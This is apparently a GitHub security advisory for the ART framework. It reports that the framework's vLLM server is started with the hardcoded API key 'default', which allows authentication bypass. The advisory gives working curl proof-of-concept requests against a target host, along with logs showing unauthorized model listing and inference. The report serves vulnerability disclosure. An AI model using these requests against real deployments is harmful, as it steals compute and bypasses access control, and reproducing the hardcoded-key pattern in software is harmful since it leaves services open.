[Security] Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass

### Advisory Details
**Title**: Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass

**Description**:

### Summary
A hardcoded credential vulnerability exists in the ART framework's vLLM server configuration generator. The framework unconditionally initializes the built-in vLLM OpenAI-compatible server with a default API key set to `"default"`. This allows any unauthenticated user with network access to the service to bypass authentication, consume LLM inference resources, and query sensitive model deployment information.

### Details
In `src/art/dev/openai_server.py`, the `get_openai_server_config` function is responsible for orchestrating the setup of the internal vLLM server. The `ServerArgs` data structure is instantiated with a hardcoded `api_key="default"`. 

Because this API key is statically assigned and passed to the vLLM engine at startup without automatically generating a secure random token or enforcing a required user-defined key, the vLLM server's internal authentication middleware consistently accepts `Authorization: Bearer default` for all incoming REST API requests.

### PoC
1. Deploy the ART framework and start a local model service (e.g., via the LocalBackend or CLI), which exposes the vLLM HTTP API on a listening port (e.g., `8000`).

2. **Step 1 — Confirm auth bypass** (list models with hardcoded key):
```bash
curl -s http://<target>:8000/v1/models \
     -H "Authorization: Bearer default" | python3 -m json.tool
```

3. **Step 2 — Demonstrate actual harm** (unauthorized inference / GPU resource theft):
```bash
curl -s http://<target>:8000/v1/chat/completions \
     -H "Authorization: Bearer default" \
     -H "Content-Type: application/json" \
     -d '{
       "model": "Qwen/Qwen1.5-0.5B",
       "messages": [{"role": "user", "content": "What is the capital of France?"}],
       "max_tokens": 64
     }' | python3 -m json.tool
```

4. **Step 3 — Negative test** (wrong key is correctly rejected, proving auth middleware is active):
```bash
curl -i http://<target>:8000/v1/models \
     -H "Authorization: Bearer wrong-key"
```

### Log of Evidence
**Step 1 — Auth bypass succeeds (model listing):**
```text
{
    "object": "list",
    "data": [
        {
            "id": "Qwen/Qwen1.5-0.5B",
            "object": "model",
            "created": 1774020077,
            "owned_by": "organization",
            "permission": []
        }
    ]
}
```

**Step 2 — Unauthorized inference succeeds (GPU resource theft):**
```text
{
    "id": "chatcmpl-583d9a951ae8",
    "object": "chat.completion",
    "created": 1774020077,
    "model": "Qwen/Qwen1.5-0.5B",
    "choices": [
        {
            "index": 0,
            "message": {
                "role": "assistant",
                "content": "The capital of France is Paris..."
            },
            "finish_reason": "stop"
        }
    ],
    "usage": {
        "prompt_tokens": 30,
        "completion_tokens": 36,
        "total_tokens": 66
    }
}
```
The model processed the attacker's prompt and returned a valid inference result, proving the attacker can **consume GPU compute resources at will** without any legitimate credentials.

**Step 3 — Wrong key is rejected (auth middleware is active):**
```text
HTTP/1.1 401 Unauthorized
content-type: application/json

{"error":{"message":"Unauthorized","type":"invalid_api_key"}}
```
This confirms the authentication mechanism is present and functioning — the vulnerability is specifically that the API key is hardcoded to a predictable value (`"default"`), not that authentication is missing.

### Impact
This is an Improper Authentication / Use of Hardcoded Credentials vulnerability. Any attacker able to route traffic to the listening port can entirely bypass the API authentication layer to make arbitrary LLM inference requests. This leads to severe resource exhaustion, financial quota depletion, Denial of Service (DoS) by maxing out GPU computation capabilities, and potential unauthorized reconnaissance of hosted models.

### Affected products
- **Ecosystem**: python
- **Package name**: art
- **Affected versions**: <= latest
- **Patched versions**: <None>

### Severity
- **Severity**: High
- **Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

### Weaknesses
- **CWE**: CWE-798: Use of Hard-coded Credentials

### Occurrences
| Permalink | Description |
| :--- | :--- |
| [https://github.com/OpenPipe/ART/blob/main/src/art/dev/openai_server.py#L30](https://github.com/OpenPipe/ART/blob/main/src/art/dev/openai_server.py#L30) | The `ServerArgs` initialization forcefully sets `api_key="default"`, causing the deployed vLLM instance to blindly accept this default key for all privileged API interactions. |


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Security] Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass #628

Advisory Details

Summary

Details

PoC

Log of Evidence

Impact

Affected products

Severity

Weaknesses

Occurrences

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

[Security] Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass #628

Description

Advisory Details

Summary

Details

PoC

Log of Evidence

Impact

Affected products

Severity

Weaknesses

Occurrences

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions